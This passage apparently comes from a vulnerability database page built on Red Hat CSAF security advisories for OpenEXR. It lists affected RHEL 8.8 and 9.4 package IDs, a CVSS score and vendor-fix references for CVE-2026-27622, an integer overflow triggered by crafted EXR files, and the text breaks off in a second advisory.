"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-0:2.2.0-12.el8_8.1.src as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_8.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-12.el8_8.1.src",
"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.i686 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.8.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_8.1.src",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_8.1.src",
"AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-30T16:02:14+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.8.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_8.1.src",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_8.1.src",
"AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:12338"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.8.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_8.1.src",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_8.1.src",
"AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-8.8.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_8.1.src",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_8.1.src",
"AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
}
]
}
RHSA-2026:8871
Vulnerability from csaf_redhat - Published: 2026-04-20 03:08 - Updated: 2026-05-14 22:36A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for openexr is now available for Red Hat Enterprise Linux 9.4 Extended Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenEXR is an open-source high-dynamic-range floating-point image file format for high-quality image processing and storage. This document presents a brief overview of OpenEXR and explains concepts that are specific to this format. This package containes the binaries for OpenEXR.\n\nSecurity Fix(es):\n\n* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:8871",
"url": "https://access.redhat.com/errata/RHSA-2026:8871"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2444251",
